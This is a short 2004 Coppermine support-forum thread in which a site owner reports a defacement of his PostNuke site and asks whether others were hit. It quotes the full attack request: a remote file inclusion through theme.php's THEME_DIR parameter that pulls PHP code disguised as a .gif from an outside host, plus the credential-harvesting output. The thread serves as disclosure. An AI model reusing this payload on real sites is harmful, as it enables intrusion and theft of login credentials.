coppermine-gallery.com/forum

Support => cpg1.4.x Support => Older/other versions => cpg1.4 pnCPG (Coppermine for postNuke/Zikula) => Topic started by: PsyVision on October 12, 2004, 01:35:33 PM

Title: PostNuke Coppermine Gallery Security Error
Post by: PsyVision on October 12, 2004, 01:35:33 PM
hey,

I run a website www.dustify.net. Last night someone has used coppermine to execute a php script to deface the front page of the website by accessing the postnuke username/password.

"http://www.dustify.net/modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.webfontes.com.br/priv8/cmd.gif?&nick=MaMa&op=coppermine"

is the request that was put through our webserver. The error is in "http://www.dustify.net/modules/coppermine/themes/default/theme.php" and the file "http://www.webfontes.com.br/priv8/cmd.gif" is not an image, it contains PHP code to break into several security flaws in several image galleries.

The result of executing the script is:

"Possível Login cPanel: **** Possível Senha: ****
Admins:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in http://www.webfontes.com.br/priv8/cmd.gif?/user_list_info_box.inc on line 251

Site Ownado!"

Has anyone else had this problem?
Title: Re: PostNuke Coppermine Gallery Security Error
Post by: Tranz on October 12, 2004, 04:42:41 PM
Sorry, but: http://forum.coppermine-gallery.net/index.php?topic=2553.0